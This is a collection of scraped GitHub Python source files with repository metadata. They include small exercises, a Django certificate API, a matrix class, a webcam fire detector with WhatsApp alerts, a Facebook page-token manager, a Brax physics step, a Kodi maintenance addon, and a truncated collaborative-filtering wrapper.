gui.show_all_elements(only_leaves=True)\n","repo_name":"MulongXie/UI-Captioning","sub_path":"module/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":20172,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"37855707672","text":"while True:\n print('')\n print('\\\n ____ _ _ \\n\\\n / ___|_ _ ___ ___ ___| \\ | |_ _ _ __ ___ \\n\\\n| | _| | | |/ _ \\/ __/ __| \\| | | | | \\'_ ` _ \\ \\n\\\n| |_| | |_| | __/\\__ \\__ \\ |\\ | |_| | | | | | | \\n\\\n \\____|\\__,_|\\___||___/___/_| \\_|\\__,_|_| |_| |_| \\n\\\n ')\n print('1. Start game')\n print('2. quit')\n\n op = input('>>> ')\n if op == '1':\n\n ans = int(input('please input the ans (0~100): '))\n start = 0\n end = 100\n count = 0\n while True:\n print('round', count)\n guess = int(input('guess a number ('+str(start)+'~'+str(end)+'): '))\n if guess > ans:\n print('lower')\n end = guess\n elif guess < ans:\n print('higher')\n start = guess\n else:\n print('hit')\n break\n count += 1\n print()\n\n print('yes, my ans is', ans)\n print('you use', count, 'round')\n\n if op == '2':\n break","repo_name":"bearhsiang/PythonIsSoEazy","sub_path":"hw/jul_7.py","file_name":"jul_7.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"12836585261","text":"from tkinter import*\r\nfrom tkinter import filedialog\r\nfrom tkPDFViewer import tkPDFViewer as pdf\r\nimport os\r\n\r\nroot = Tk()\r\n#For the title\r\nroot.title(\"LEPLA :-: PDF Viwer\")\r\n\r\n#for the icon change\r\nroot.iconbitmap('D:/Icons/bush.ico')\r\n\r\n#windows geometry \r\nroot.geometry('630x700+400+100')\r\n\r\ndef browsefiles():\r\n filename=filedialog.askopenfilename(initialdir=os.getcwd(),\r\n title=\"Select Your PDF File\", filetypes=((\"PDF File\",\".pdf\"),\r\n (\"PDF File\",\".PDF\"),\r\n (\"All File\",\"txt\")))\r\n v1=pdf.ShowPdf()\r\n v2=v1.pdf_view(root, pdf_location=open(filename,\"r\"), width=77, height=100)\r\n v2.pack(pady=(0,0))\r\n\r\nbutton=Button(root, text=\"PDF Viwer\",command=browsefiles, width=40, bd=4)\r\nbutton.pack()\r\n\r\n# for background colour \r\nroot.configure(bg='#E7D7CB')\r\nroot.mainloop()\r\n","repo_name":"shrutiypatil/Mini-Projects","sub_path":"PDF.py","file_name":"PDF.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"22101461825","text":"MED = 0\nCHI = 0\nGRA = 0\nN = int(input(\"Cuales son los numeros de ventas del vendedor: \"))\nfor i in range(1,N,1):\n V = float(input(\"De cuanto es tu venta:$ \"))\n if V<=200:\n CHI += 1\n else:\n if V<400:\n MED += 1\n else:\n GRA += 1\nprint(f\"CHI es:\",CHI)\nprint(f\"La acumulacion de ventas menores:\",MED)\nprint(f\"GRA es:\",GRA)\nprint(\"Fin del programa\")\n","repo_name":"JaimeOmar1904/CYPJaimeRM","sub_path":"libro/problemas_resueltos/capitulo3/problema3_7.py","file_name":"problema3_7.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"14398563436","text":"import uuid\nfrom datetime import date\nfrom django.http import JsonResponse\nfrom django.middleware.csrf import get_token\nimport json\nfrom .models import Certificate, CertificateDetails\n\n'''The following operations are the request and response engine \n for the application which recieves request according to the desired operation'''\n\n\ndef generate_certificate(request):\n if request.method == 'POST':\n payload = json.loads(request.body.decode('utf-8'))\n name = payload.get('name')\n course_name = payload.get('course_name')\n certificate_award_date = payload.get('certificate_award_date')\n \n\n '''Generate a unique ID for the certificate'''\n\n certificate_id = str(uuid.uuid4()).upper()\n\n '''Set the certificate generation date to today's date'''\n \n certificate_generation_date = date.today().strftime('%Y-%m-%d')\n\n ''' creates an object to save the details such as id and date of generation in the database \n with the help of Foreign Key of certificate id and certificate generated date '''\n\n cert = Certificate.objects.create(certificate_unique_id = certificate_id, \n certificate_generation_date = certificate_generation_date)\n\n\n '''Create a dictionary containing the certificate details'''\n\n certificate = {\n 'name': name,\n 'course-name': course_name,\n 'certificate_award_date': certificate_award_date,\n 'certificate_generation_date': certificate_generation_date,\n 'certificate_id': certificate_id,\n }\n\n ''' creates an object to save all the details of the certificate in the database \n with the help of Foreign Key of certificate id and certificate generated date '''\n \n certificate_details = CertificateDetails.objects.create(\n certificate_id=cert,\n name= name,\n course_name=course_name,\n certificate_award_date= certificate_award_date \n )\n certificate_details.save()\n \n return JsonResponse(certificate)\n\n '''If the request method is not POST, return a 405 Method Not Allowed response'''\n\n return JsonResponse({'error': 'Method Not Allowed'})\n\n\ndef verify_certificate(request):\n \n payload = json.loads(request.body.decode('utf-8'))\n certificate_generation_date = payload.get('certificate_generation_date')\n certificate_id = payload.get('certificate_id')\n is_valid_certificate = False\n try:\n '''get function to detect the id and the date from the database to validate the certificate'''\n\n Certificate.objects.get(certificate_unique_id=certificate_id, certificate_generation_date=certificate_generation_date)\n is_valid_certificate = True\n except Exception as e:\n print(f\"Some exception occured - {e}\")\n return JsonResponse({'is_valid_certificate': is_valid_certificate})\n\n\ndef fetch_certificate(request):\n payload = json.loads(request.body.decode('utf-8'))\n certificate_id = payload.get('certificate_id')\n certificate_generation_date = payload.get('certificate_generation_date')\n try:\n certificate_1 = CertificateDetails.objects.get(certificate_id__certificate_unique_id=certificate_id, certificate_id__certificate_generation_date=certificate_generation_date)\n\n '''Create a dictionary containing the certificate details'''\n\n certificate_details = {\n 'name': certificate_1.name,\n 'course-name': certificate_1.course_name,\n 'certificate_award_date': certificate_1.certificate_award_date,\n 'certificate_generation_date': certificate_1.certificate_id.certificate_generation_date,\n 'certificate_id': certificate_1.certificate_id.certificate_unique_id,\n }\n except CertificateDetails.DoesNotExist:\n return JsonResponse({'error': 'Certificate not found'}) \n \n return JsonResponse(certificate_details)","repo_name":"Saro259/Certificate-Generator-API","sub_path":"certificate_generator_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"380257814","text":"import numpy as np\r\n\r\n\r\nclass Matrix(object):\r\n '''\r\n Класс, представляющий собой матрицу и многие методы к ней\r\n '''\r\n\r\n def __init__(self, matr):\r\n types = (np.ndarray, list, tuple)\r\n\r\n if type(matr) not in types:\r\n raise TypeError('Не могу обработать такой тип')\r\n\r\n if type(matr[0]) not in types:\r\n raise ValueError('Объект не двумерный')\r\n\r\n if type(matr[0][0]) in types:\r\n raise ValueError('Слишком много измерений')\r\n\r\n a = len(matr[0])\r\n for row in matr:\r\n if type(row) not in types:\r\n raise ValueError('Матрица не целостная')\r\n\r\n if len(row) != a:\r\n raise ValueError('Объект не прямоугольной формы')\r\n a = len(row)\r\n\r\n for item in row:\r\n if type(item) in types:\r\n raise ValueError('Где-то лишнее измерение')\r\n\r\n self.matrix = np.array(matr, dtype='float')\r\n\r\n def add_row(self, row):\r\n # Добавление строки в матрицу\r\n if len(row) != self.matrix.shape[1]:\r\n raise TypeError('Длинна строки не совпадает с длинной матрицы!')\r\n\r\n self.matrix = np.vstack([self.matrix, row])\r\n\r\n return Matrix(self.matrix)\r\n\r\n def add_column(self, column):\r\n # Добавление столбца в матрицу\r\n if len(column) != self.matrix.shape[0]:\r\n raise TypeError('Высота столбца не совпадает с высотой матрицы!')\r\n\r\n self.matrix = np.hstack([self.matrix, np.reshape(column, (len(column), 1))])\r\n\r\n return Matrix(self.matrix)\r\n\r\n @property\r\n def shape(self):\r\n # Функция для получения формы матрицы\r\n return self.matrix.shape\r\n\r\n def __matmul__(self, other):\r\n # Математическое умножение матриц\r\n if self.matrix.shape[0] != other.matrix.shape[1]:\r\n raise ValueError('Высота первой матрицы не совпадает с шириной второй!')\r\n\r\n new_M = np.zeros((self.matrix.shape[0], other.matrix.shape[1]))\r\n for i in range(self.matrix.shape[0]):\r\n for j in range(other.matrix.shape[1]):\r\n new_M[i, j] = sum(self.matrix[i, :] * other.matrix[:, j])\r\n\r\n return Matrix(new_M)\r\n\r\n def __mul__(self, other):\r\n # Умножение матрицы на число или методом Адамара\r\n if type(other) == Matrix:\r\n return Matrix(self.matrix * other.matrix)\r\n else:\r\n return Matrix(self.matrix * other)\r\n\r\n def __add__(self, other):\r\n # Сложение матриц\r\n if self.matrix.shape != other.matrix.shape:\r\n raise TypeeError('Матрицы разной размерности!')\r\n new_M = np.zeros(self.matrix.shape)\r\n\r\n for i in range(self.matrix.shape[0]):\r\n for j in range(self.matrix.shape[1]):\r\n new_M[i, j] = self.matrix[i, j] + other.matrix[i, j]\r\n\r\n return Matrix(new_M)\r\n\r\n def __sub__(self, other):\r\n # Вычетание матриц\r\n if self.matrix.shape != other.matrix.shape:\r\n raise TypeeError('Матрицы разной размерности!')\r\n new_M = np.zeros(self.matrix.shape)\r\n\r\n for i in range(self.matrix.shape[0]):\r\n for j in range(self.matrix.shape[1]):\r\n new_M[i, j] = self.matrix[i, j] - other.matrix[i, j]\r\n\r\n return Matrix(new_M)\r\n\r\n @property\r\n def T(self):\r\n # Транспонирование матрицы\r\n TM = np.zeros(self.matrix.shape[::-1])\r\n for i in range(len(self.matrix)):\r\n for j in range(len(self.matrix[0])):\r\n TM[j, i] = self.matrix[i, j]\r\n\r\n return Matrix(TM)\r\n\r\n @property\r\n def trace(self):\r\n # След матрицы\r\n return sum(self.m_diag)\r\n\r\n def kron(self, other):\r\n # Умножение матриц методом Кронекера\r\n rows = []\r\n for i in range(len(self.matrix)):\r\n row = []\r\n for j in range(len(self.matrix[0])):\r\n row.append(other.matrix * self.matrix[i, j])\r\n rows.append(row)\r\n\r\n n_rows = []\r\n for row in rows:\r\n n_row = row[0]\r\n for item in row[1:]:\r\n n_row = np.hstack([n_row, item])\r\n n_rows.append(n_row)\r\n\r\n new_M = n_rows[0]\r\n for row in n_rows[1:]:\r\n new_M = np.vstack([new_M, row])\r\n\r\n return Matrix(new_M)\r\n\r\n @property\r\n def m_diag(self):\r\n # Получение главной диагонали матрицы\r\n tr = []\r\n for i in range(min(self.matrix.shape)):\r\n tr.append(self.matrix[i, i])\r\n return tr\r\n\r\n def __pow__(self, other):\r\n # Возведение матрицы в степень\r\n if other < 0:\r\n raise ValueError('Степень должна быть неотрицательной!')\r\n\r\n if other == 0:\r\n return Matrix(np.diag(np.ones(min(self.shape))))\r\n\r\n new_M = Matrix(self.matrix)\r\n for i in range(other - 1):\r\n new_M = new_M @ Matrix(self.matrix)\r\n\r\n return new_M\r\n\r\n @property\r\n def inv(self):\r\n # Обратная матрица\r\n if self.det == 0:\r\n raise ValueError('Определитель не должен быть равен нулю!')\r\n\r\n return Matrix(np.linalg.inv(self.matrix))\r\n\r\n # Функция добавлена для полноты функционала, реализована через numpy\r\n\r\n @property\r\n def det(self):\r\n # Определитель матрицы\r\n if self.matrix.shape[0] != self.matrix.shape[1]:\r\n raise TypeError('Матрица должна быть квадратной!')\r\n\r\n return np.linalg.det(self.matrix)\r\n\r\n # Функция добавлена для полноты функционала, реализована через numpy\r\n\r\n def __repr__(self):\r\n # Функция, отвечающая за вывод данных о матрице\r\n return str(self.matrix)","repo_name":"kykazabra/Matrixes","sub_path":"Матрицы и операции.py","file_name":"Матрицы и операции.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"32784390721","text":"# importing libraries \n\nimport numpy as np \nimport cv2 \nimport tensorflow as tf\nimport os\nimport urllib.request\nimport time\nfrom multiprocessing import Process\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom twilio.rest import Client\n\n\n#function to make predictions using saved model\ndef predict_now(img,model):\n\n\n resize = cv2.resize(img,(160,160))\n rgb = cv2.cvtColor(resize,cv2.COLOR_BGR2RGB)\n test2 = rgb[np.newaxis is None,:,:,:]\n\n #make prediction and calculate time required\n start = time.time()\n predictions = model.predict(test2)\n end = time.time()\n os.system('clear')\n\n print('Predictions:{} Time taken: {}\\n'.format(predictions[0][0], end-start))\n \n #based of model predictions send out message to user on whatasapp if there is a fire hazaard detected \n if predictions < -1 :\n print('Fire hazard!\\n')\n \n client.messages.create(body='Fire Hazard',\n from_=from_whatsapp_number,\n to=to_whatsapp_number)\n\n elif predictions > -1 and predictions < 1.5:\n print('Warning posibility of fire\\n')\n \n client.messages.create(body='warning Possible Fire Hazard',\n from_=from_whatsapp_number,\n to=to_whatsapp_number)\n\n else:\n print('No fire hazard\\n')\n\n time.sleep(1)\n print('New image capture')\n\n return predictions[0][0], end-start\n\n\n\n#stream from a link or use webcams connected to the device\nsource = 'rtsp://192.168.0.102:8080/video/h264'\n\n #OR \n\n# source = 0\n\n#path to model on the device\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\npath_to_model = os.path.join(BASE_DIR, 'fire_detect_model')\nclient = Client()\n\n#using twilo to detect number\nfrom_whatsapp_number='whatsapp:+14155238886'\n\nto_whatsapp_number='whatsapp:+918286838255'\n\n#loac model\nmodel = tf.keras.models.load_model(path_to_model)\n\nif __name__ == '__main__':\n\n\n cap = cv2.VideoCapture(source)\n start = start = time.time()\n diff=1\n while(1): \n # make predictions every 6 seconds \n if int(diff)%6 == 0:\n predict_now(img,model)\n\n ret, img = cap.read();\n\n cv2.imshow('image', img)\n\n #calc time elasped\n end = time.time()\n diff = end-start\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()","repo_name":"TareDevarsh/fire_detection_ml","sub_path":"model_load.py","file_name":"model_load.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"37124218836","text":"import logging\nfrom typing import List, Optional\n\nfrom facebook_business.api import FacebookRequest\n\nfrom common.connect.redis import get_redis\nfrom common.enums.entity import Entity\nfrom common.store.scope import AssetScope\nfrom oozer.common.facebook_api import PlatformApiContext, DEFAULT_PAGE_ACCESS_TOKEN_LIMIT\nfrom oozer.common.job_scope import JobScope\n\nlogger = logging.getLogger(__name__)\n\n\nclass PageTokenManager:\n def __init__(self, asset_scope: str, sweep_id: str):\n self._redis = get_redis()\n self._sweep_id = sweep_id\n self._asset_scope = asset_scope\n\n def token_queue_key(self, page_id: str) -> str:\n return f'{self._asset_scope}-{self._sweep_id}-page-{page_id}-tokens-queue'\n\n @classmethod\n def populate_from_scope_entity(cls, scope_entity: AssetScope, sweep_id: str):\n asset_scope = JobScope.namespace\n tokens = list(scope_entity.platform_tokens)\n\n try:\n manager = PageTokenManager(asset_scope, sweep_id)\n with PlatformApiContext(tokens[0]) as fb_ctx:\n request = FacebookRequest(\n node_id='me', method='GET', endpoint='/accounts', api=fb_ctx.api, api_type='NODE'\n )\n request.add_params({'limit': DEFAULT_PAGE_ACCESS_TOKEN_LIMIT})\n cnt = 0\n while True:\n # I assume that there's a better way to do paginate over this,\n # but I wasn't able to find the corresponding target class in SDK :/\n response = request.execute()\n response_json = response.json()\n for page in response_json['data']:\n manager.add(page['id'], page['access_token'])\n cnt += 1\n\n if 'next' in response_json['paging']:\n request._path = response_json['paging']['next']\n else:\n break\n\n logger.warning(f'Loaded {cnt} page tokens for scope \"{scope_entity.scope}\"')\n except Exception as ex:\n print(ex)\n logger.warning('Fetching page tokens has failed so organic data jobs will not work in this sweep')\n\n @classmethod\n def from_job_scope(cls, job_scope: JobScope) -> 'PageTokenManager':\n \"\"\"\n infers required asset scope parameters from JobScope data\n and creates an instance of PlatformTokenManager properly set for\n management of tokens required for the job.\n\n Convenience method for use in worker code for quick derivation\n of appropriate scope for the PlatformTokenManager\n\n This is the \"read\" side of the \"write\" side depicted in\n populate_from_scope_entity method immediately above.\n If you change it here, change it there.\n \"\"\"\n if job_scope.entity_type == Entity.Scope:\n asset_scope = job_scope.entity_id\n else:\n # TODO: This needs to be scope ID somehow eventually\n # as platform tokens are grouped per scope ID\n # Until then, we, effectively, will have only one tokens pool\n asset_scope = job_scope.namespace # likely something like 'fb' or 'tw'\n\n return PageTokenManager(asset_scope, job_scope.sweep_id)\n\n def add(self, page_id: str, *tokens: List[str]):\n \"\"\"\n Add one or more tokens to the tokens inventory.\n\n Seeds temporary tokens inventory with tokens, while resetting\n their usage counters to zero.\n \"\"\"\n self._redis.zadd(\n self.token_queue_key(page_id),\n # switching this from **dict((token, 0) for token in tokens)\n # to positional args list and thus *args passing because when we do dict()\n # each token value becomes a hash key, that is coerced into\n # acting as a named arg, which is dangerous for tokens\n # that may contain characters not allowed to be in variable names.\n # So, keeping them as positional str args instead\n # Combined list must be a sequence of key, score, key2, score2, ...\n *(arg for token in tokens for arg in [token, 0]),\n )\n\n def remove(self, page_id: str, *tokens: List[str]):\n \"\"\"\n Like .add but in reverse.\n \"\"\"\n self._redis.zrem(self.token_queue_key(page_id), *tokens)\n\n def get_best_token(self, page_id: str) -> Optional[str]:\n token_candidate = (self._redis.zrange(self.token_queue_key(page_id), 0, 1) or [None])[0]\n if token_candidate is not None:\n return token_candidate.decode('utf8')\n return None\n","repo_name":"panoramichq/data-collection-fb","sub_path":"common/page_tokens.py","file_name":"page_tokens.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"38316528884","text":"from brax import actuator\nfrom brax import com\nfrom brax import fluid\nfrom brax import geometry\nfrom brax import kinematics\nfrom brax.base import Motion, System\nfrom brax.positional import collisions\nfrom brax.positional import integrator\nfrom brax.positional import joints\nfrom brax.positional.base import State\nimport jax\nfrom jax import numpy as jp\n\n\ndef init(\n sys: System, q: jax.Array, qd: jax.Array, debug: bool = False\n) -> State:\n \"\"\"Initializes physics state.\n\n Args:\n sys: a brax system\n q: (q_size,) joint angle vector\n qd: (qd_size,) joint velocity vector\n debug: if True, adds contact to the state for debugging\n\n Returns:\n state: initial physics state\n \"\"\"\n # position/velocity level terms\n x, xd = kinematics.forward(sys, q, qd)\n j, jd, a_p, a_c = kinematics.world_to_joint(sys, x, xd)\n x_i, xd_i = com.from_world(sys, x, xd)\n contact = geometry.contact(sys, x) if debug else None\n mass = sys.link.inertia.mass ** (1 - sys.spring_mass_scale)\n return State(q, qd, x, xd, contact, x_i, xd_i, j, jd, a_p, a_c, mass)\n\n\ndef step(\n sys: System, state: State, act: jax.Array, debug: bool = False\n) -> State:\n \"\"\"Performs a single physics step using position-based dynamics.\n\n Resolves actuator forces, joints, and forces at acceleration level, and\n resolves collisions at velocity level with baumgarte stabilization.\n\n Args:\n sys: system defining the kinematic tree and other properties\n state: physics state prior to step\n act: (act_size,) actuator input vector\n debug: if True, adds contact to the state for debugging\n\n Returns:\n x: updated link transform in world frame\n xd: updated link motion in world frame\n \"\"\"\n x_i_prev = state.x_i\n\n # calculate acceleration level updates\n tau = actuator.to_tau(sys, act, state.q, state.qd)\n xdd_i = Motion.create(vel=sys.gravity)\n # get joint constraint forces\n xf_i = joints.acceleration_update(sys, state, tau)\n if sys.enable_fluid:\n inertia = sys.link.inertia.i ** (1 - sys.spring_inertia_scale)\n xf_i += fluid.force(sys, state.x, state.xd, state.mass, inertia)\n xdd_i += Motion(\n ang=jax.vmap(lambda x, y: x @ y)(com.inv_inertia(sys, state.x), xf_i.ang),\n vel=jax.vmap(lambda x, y: x * y)(1 / state.mass, xf_i.vel),\n )\n\n # semi-implicit euler: apply acceleration update before resolving collisions\n x_i, xd_i = integrator.integrate_xdd(sys, state.x_i, state.xd_i, xdd_i)\n x, xd = com.to_world(sys, x_i, xd_i)\n state = state.replace(x=x, xd=xd, x_i=x_i, xd_i=xd_i)\n\n # perform position level joint updates\n x_i = joints.position_update(sys, state)\n x, _ = com.to_world(sys, x_i, xd_i)\n state = state.replace(x=x, x_i=x_i)\n\n # apply position level collision updates\n contact = geometry.contact(sys, x)\n x_i, dlambda = collisions.resolve_position(sys, state, x_i_prev, contact)\n xd_i_prev = xd_i\n\n xd_i = integrator.project_xd(sys, x_i, x_i_prev)\n x, xd = com.to_world(sys, x_i, xd_i)\n state = state.replace(x=x, xd=xd, x_i=x_i, xd_i=xd_i)\n\n # apply velocity level collision updates\n xdv_i = collisions.resolve_velocity(sys, state, xd_i_prev, contact, dlambda)\n xd_i = integrator.integrate_xdv(sys, xd_i, xdv_i)\n\n x, xd = com.to_world(sys, x_i, xd_i)\n j, jd, a_p, a_c = kinematics.world_to_joint(sys, x, xd)\n q, qd = kinematics.inverse(sys, j, jd)\n contact = geometry.contact(sys, x) if debug else None\n\n return State(q, qd, x, xd, contact, x_i, xd_i, j, jd, a_p, a_c, state.mass)\n","repo_name":"google/brax","sub_path":"brax/positional/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":1857,"dataset":"github-code","pt":"82"} +{"seq_id":"28064707627","text":"# сначала количество пар элементов последовательности, \r\n#в которых хотя бы одно число делится на 3, \r\n#затем максимальную из сумм элементов таких пар\r\ncount = 0\r\nm = -20001\r\nf = open('17/37336.txt')\r\nl = [int(i) for i in f]\r\nfor i in range(len(l) - 1):\r\n if (l[i] % 3 == 0) or (l[i + 1] % 3 == 0):\r\n count += 1\r\n m = max(m, l[i]+ l[i + 1])\r\nprint(count, m)","repo_name":"maximkidalov/kostya_ege","sub_path":"егэ/17/37336.py","file_name":"37336.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"31191464017","text":"#Фибоначчи\r\nfirst = 1\r\nsecond = 2\r\n\r\ni = 0\r\nn = input(\"какой элемент (указывать целое число!) из ряда вам нужен?: \")\r\nwhile n.isdigit() is False or int(n) < 0:\r\n n = input(\"какой элемент (указывать целое число!) из ряда вам нужен?: \")\r\nwhile i < int(n):\r\n the_sum = first + second\r\n first = second\r\n second = the_sum\r\n i += 1\r\nprint(the_sum)\r\n\r\n","repo_name":"YuryYefr/PyBase08","sub_path":"HW_2_4.py","file_name":"HW_2_4.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"18804748388","text":"\"\"\"\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see .\r\n\"\"\"\r\nimport xbmc, xbmcaddon, xbmcgui, xbmcplugin, xbmcvfs,os,sys\r\nimport urllib\r\nimport re\r\nimport time\r\nimport zipfile\r\nfrom math import trunc\r\nfrom resources.lib.modules import control\r\nfrom datetime import datetime\r\nfrom resources.lib.modules.backtothefuture import unicode, PY2\r\n\r\nif PY2:\r\n FancyURLopener = urllib.FancyURLopener\r\n translatePath = xbmc.translatePath\r\nelse:\r\n FancyURLopener = urllib.request.FancyURLopener\r\n translatePath = xbmcvfs.translatePath\r\n\r\ndp = xbmcgui.DialogProgress()\r\ndialog = xbmcgui.Dialog()\r\naddonInfo = xbmcaddon.Addon().getAddonInfo\r\n\r\nAddonTitle=\"EZ Maintenance+\"\r\nAddonID ='script.ezmaintenanceplus'\r\n\r\n\r\ndef xml_data_advSettings_old(size):\r\n xml_data=\"\"\"\r\n \r\n 10\r\n 20\r\n 2\r\n %s\r\n 2\r\n 20\r\n \r\n\"\"\" % size\r\n return xml_data\r\n\r\ndef xml_data_advSettings_New(size):\r\n xml_data=\"\"\"\r\n \r\n 10\r\n 20\r\n 2\r\n \r\n \r\n %s\r\n 2\r\n 20\r\n \r\n\"\"\" % size\r\n return xml_data\r\n\r\ndef advancedSettings():\r\n XML_FILE = translatePath(os.path.join('special://home/userdata' , 'advancedsettings.xml'))\r\n MEM = xbmc.getInfoLabel(\"System.Memory(total)\")\r\n FREEMEM = xbmc.getInfoLabel(\"System.FreeMemory\")\r\n BUFFER_F = re.sub('[^0-9]','',FREEMEM)\r\n BUFFER_F = int(BUFFER_F) / 3\r\n BUFFERSIZE = trunc(BUFFER_F * 1024 * 1024)\r\n try: KODIV = float(xbmc.getInfoLabel(\"System.BuildVersion\")[:4])\r\n except: KODIV = 16\r\n\r\n\r\n \"\"\",customlabel='Cancel'\"\"\"\r\n choice = dialog.yesno(AddonTitle, 'Based on your free Memory your optimal buffersize is: \\n' + str(BUFFERSIZE) + ' Bytes' + ' (' + str(round(BUFFER_F)) + ' MB)' + '\\n' + 'Note that your current advanced settings will be overwritten!' + '\\n' + 'Choose an Option below or press ESC ESC to abort.', yeslabel='Use Optimal',nolabel='Input a Value' )\r\n if choice == 1:\r\n with open(XML_FILE, \"w\") as f:\r\n if KODIV >= 17: xml_data = xml_data_advSettings_New(str(BUFFERSIZE))\r\n else: xml_data = xml_data_advSettings_old(str(BUFFERSIZE))\r\n\r\n f.write(xml_data)\r\n dialog.ok(AddonTitle,'Buffer Size Set to: ' + str(BUFFERSIZE) + '\\n' + 'Please restart Kodi for settings to apply.')\r\n\r\n elif choice == 0:\r\n BUFFERSIZE = _get_keyboard( default=str(BUFFERSIZE), heading=\"INPUT BUFFER SIZE (Bytes) or ESC/Cancel to abort\", cancel=\"-\")\r\n if BUFFERSIZE != \"-\":\r\n with open(XML_FILE, \"w\") as f:\r\n if KODIV >= 17: xml_data = xml_data_advSettings_New(str(BUFFERSIZE))\r\n else: xml_data = xml_data_advSettings_old(str(BUFFERSIZE))\r\n f.write(xml_data)\r\n dialog.ok(AddonTitle,'Buffer Size Set to: ' + str(BUFFERSIZE) + '\\n' + 'Please restart Kodi for settings to apply.')\r\n\r\n\r\ndef open_Settings():\r\n open_Settings = xbmcaddon.Addon(id=AddonID).openSettings()\r\n\r\ndef _get_keyboard( default=\"\", heading=\"\", hidden=False, cancel=\"\" ):\r\n \"\"\" shows a keyboard and returns a value \"\"\"\r\n if cancel == \"\":\r\n cancel=default\r\n keyboard = xbmc.Keyboard( default, heading, hidden )\r\n keyboard.doModal()\r\n if ( keyboard.isConfirmed() ):\r\n return unicode( keyboard.getText())\r\n return cancel\r\n\r\n\r\n############################## END #########################################","repo_name":"peno64/script.ezmaintenanceplus","sub_path":"resources/lib/modules/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"82"} +{"seq_id":"31343209605","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 18/12/18\n\n@author: Maurizio Ferrari Dacrema\n\"\"\"\n\nfrom Base.BaseCBFRecommender import BaseItemCBFRecommender\nfrom Base.BaseMatrixFactorizationRecommender import BaseMatrixFactorizationRecommender\nfrom Base.BaseTempFolder import BaseTempFolder\n\nimport os, shutil\n\nfrom numpy import genfromtxt\nfrom Base.Recommender_utils import check_matrix\nimport scipy.sparse as sps\nimport numpy as np\nimport scipy.io\n\ntry:\n import matlab.engine\nexcept ImportError:\n print(\"CollaborativeDL_Matlab_RecommenderWrapper: Unable to import Matlab engine. Fitting of a new model will not be possible\")\n\n\n\nclass CollaborativeDL_Matlab_RecommenderWrapper(BaseItemCBFRecommender, BaseMatrixFactorizationRecommender, BaseTempFolder):\n\n\n RECOMMENDER_NAME = \"CollaborativeDL_Matlab_RecommenderWrapper\"\n\n DEFAULT_GSL_LIB_FOLDER = '/usr/lib/x86_64-linux-gnu/'\n\n\n\n def __init__(self, URM_train, ICM_train):\n super(CollaborativeDL_Matlab_RecommenderWrapper, self).__init__(URM_train, ICM_train)\n\n def fit(self,\n batch_size = 128,\n para_lv=10,\n para_lu=1,\n para_ln=1e3,\n epoch_sdae=1000,\n epoch_dae=500,\n temp_file_folder = None,\n gsl_file_folder = None):\n\n\n self.temp_file_folder = self._get_unique_temp_folder(input_temp_file_folder=temp_file_folder)\n\n if gsl_file_folder is None:\n print(\"{}: Using default gsl folder '{}'\".format(self.RECOMMENDER_NAME, self.DEFAULT_GSL_LIB_FOLDER))\n self.gsl_folder = self.DEFAULT_GSL_LIB_FOLDER\n else:\n print(\"{}: Using gsl folder '{}'\".format(self.RECOMMENDER_NAME, gsl_file_folder))\n self.gsl_folder = gsl_file_folder\n\n\n\n\n # input_user_file = 'ctr-data/folder45/cf-train-1-users.dat'\n # input_item_file = 'ctr-data/folder45/cf-train-1-items.dat'\n\n print(\"CollaborativeDL_Matlab_RecommenderWrapper: Saving temporary data files for matlab use ... \")\n\n n_features = self.ICM_train.shape[1]\n\n content_file = self.temp_file_folder + \"ICM.mat\"\n scipy.io.savemat(content_file, {\"X\": self.ICM_train.toarray()}, appendmat=False)\n\n input_user_file = self.temp_file_folder + \"cf-train-users.dat\"\n self._save_dat_file_from_URM(self.URM_train, input_user_file)\n\n input_item_file = self.temp_file_folder + \"cf-train-items.dat\"\n self._save_dat_file_from_URM(self.URM_train.T, input_item_file)\n\n print(\"CollaborativeDL_Matlab_RecommenderWrapper: Saving temporary data files for matlab use ... done!\")\n\n print(\"CollaborativeDL_Matlab_RecommenderWrapper: Calling matlab.engine ... \")\n\n eng = matlab.engine.start_matlab()\n\n matlab_script_directory = os.getcwd() + \"/Conferences/KDD/CollaborativeDL_github_matlab/example\"\n matlab_backward_path_prefix = 